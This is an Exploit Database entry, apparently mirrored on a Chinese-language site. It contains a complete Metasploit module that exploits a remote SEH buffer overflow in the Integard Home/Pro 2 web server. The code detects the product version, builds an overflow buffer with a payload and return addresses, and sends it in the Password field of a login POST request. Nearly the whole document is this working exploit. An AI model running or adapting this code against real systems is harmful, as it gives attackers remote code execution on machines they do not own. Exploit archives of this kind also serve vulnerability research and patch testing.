Integard Home and Pro 2 – Remote HTTP Buffer Overflow

• Exploit Database
• 146 阅读

• 作者： Lincoln, Nullthreat, rick2600
  日期： 2010-09-07
• 类别：

  • remote
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/14941/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105

  class Metasploit3 < Msf::Exploit::Remote   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Integard Home/Pro version 2.0&apos;, &apos;Description&apos;=> %q{ Exploit for Integard HTTP Server, vulnerability discovered by Lincoln }, &apos;Author&apos;=> [ &apos;Lincoln&apos;, &apos;Nullthreat&apos;, &apos;rick2600&apos;, &apos;corelanc0d3r&apos; ], &apos;License&apos; => MSF_LICENSE, &apos;Version&apos; => &apos;$Revision: $&apos;, &apos;References&apos;=> [ [&apos;URL&apos;,&apos;http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061&apos;], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;thread&apos;, }, &apos;Payload&apos;=> { &apos;Space&apos;=> 2000, &apos;BadChars&apos;=> "\x00\x20\x26\x2f\x3d\x3f\x5c", &apos;StackAdjustment&apos; => -1500, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Privileged&apos; => false, &apos;Targets&apos;=> [ [ &apos;Automatic Targeting&apos;,{ &apos;auto&apos; => true }], [ &apos;Integard Home 2.0.0.9021&apos;, { &apos;Ret&apos; => 0x0041565E,}], [ &apos;Integard Pro2.2.0.9026&apos;, { &apos;Ret&apos; => 0x0040362C,}], ], &apos;DefaultTarget&apos;=> 0))   register_options( [ Opt::RPORT(18881) ], self.class ) end     def exploit mytarget = target continueattack=true if(target[&apos;auto&apos;]) mytarget = nil print_status("[*] Automatically detecting the target...") connect response = send_request_raw( {&apos;uri&apos; => &apos;/banner.jpg&apos;, &apos;version&apos; => &apos;1.1&apos;, &apos;method&apos; => &apos;GET&apos; }, 5) contlength = response[&apos;Content-Length&apos;] if (contlength == "24584") print_status("[!] Found Version - Integard Home") mytarget = self.targets[1] elsif (contlength == "23196") print_status("[!] Found Version - Integard Pro") mytarget = self.targets[2] else print_status("[-] Unknown Version") continueattack=false end disconnect end if continueattack print_status("[!] Selected Target: #{mytarget.name}") print_status("[*] Building Buffer") pay = payload.encoded junk = rand_text_alpha_upper(3091 - pay.length) jmp = "\xE9\x2B\xF8\xFF\xFF" nseh = "\xEB\xF9\x90\x90" seh = [mytarget.ret].pack(&apos;V&apos;) buffer = junk + pay + jmp + nseh + seh print_status("[*] Sending Request") post_data = "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login" req = "/LoginAdmin" connect send_request_raw({ &apos;uri&apos; => req, &apos;version&apos; => &apos;1.1&apos;, &apos;method&apos; => &apos;POST&apos;, &apos;headers&apos; => { &apos;Host&apos; => &apos;192.168.1.1:18881&apos;, &apos;Content-Length&apos; => 1074 }, &apos;data&apos; => post_data }, 5) print_status("[*] Request Sent") handler end end end